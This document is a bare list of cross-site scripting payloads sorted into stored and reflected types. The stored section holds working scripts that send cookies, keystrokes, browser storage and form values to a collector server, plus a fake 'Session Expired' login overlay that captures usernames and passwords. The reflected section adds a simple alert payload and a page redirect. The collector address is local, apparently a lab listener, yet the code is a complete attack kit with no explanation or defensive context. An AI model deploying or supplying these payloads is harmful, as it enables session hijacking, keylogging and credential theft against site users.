STORED XSS

1. Cookies

<script>new Image().src='http://127.0.0.1:5001/steal?cookie='+btoa(document.cookie)+"&url="+encodeURIComponent(window.location.href)</script>

2. keylogging

<script>let k='';document.onkeydown=e=>{(k+=e.key+' ').length>50&&fetch('http://127.0.0.1:5001/log',{method:'POST',body:k});}</script>

3. Session

<script>
let sessionData = {
    cookies: document.cookie,
    localStorage: Object.fromEntries(Object.entries(localStorage)),
    sessionStorage: Object.fromEntries(Object.entries(sessionStorage)),
    forms: Array.from(document.forms).reduce((acc, form) => {
        Array.from(form.elements).forEach(el => {
            if (el.name) acc[el.name] = el.value;
        });
        return acc;
    }, {}),
    url: window.location.href,
    referrer: document.referrer,
    userAgent: navigator.userAgent
};

fetch('http://127.0.0.1:5001/exfil', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(sessionData)
}).catch(()=>{});
</script>


4. Credential Stuffing

<script>(function(){if(document.getElementById('phish'))return;var d=document.createElement('div');d.id='phish';d.style='position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(0,0,0,0.85);z-index:999999;display:flex;align-items:center;justify-content:center;';d.innerHTML=`<div style="width:350px;padding:30px;background:#fff;border-radius:8px;text-align:center;"><h3>Session Expired</h3><p>Re-authenticate:</p><input id="u" placeholder="Username" style="width:100%;padding:10px;margin:5px 0;border:1px solid #ccc;border-radius:4px;box-sizing:border-box;"><input id="p" type="password" placeholder="Password" style="width:100%;padding:10px;margin:5px 0;border:1px solid #ccc;border-radius:4px;box-sizing:border-box;"><button onclick="stealCreds()" style="width:100%;padding:10px;background:#007bff;color:white;border:none;border-radius:4px;cursor:pointer;">Login</button></div>`;document.body.appendChild(d);window.stealCreds=function(){var u=document.getElementById('u').value,p=document.getElementById('p').value;new Image().src='http://127.0.0.1:5001/phish?user='+encodeURIComponent(u)+'&pass='+encodeURIComponent(p)+'&url='+encodeURIComponent(window.location.href);alert('Success! Redirecting...');d.remove();};document.getElementById('u').focus();new Image().src='http://127.0.0.1:5001/xss-executed?domain='+encodeURIComponent(window.location.hostname);})();</script>

REFLECTED XSS



1. Alert

<script>alert("Hacked")</script>

2. Redirect

<script>
window.location.href = "https://google.com";
</script>
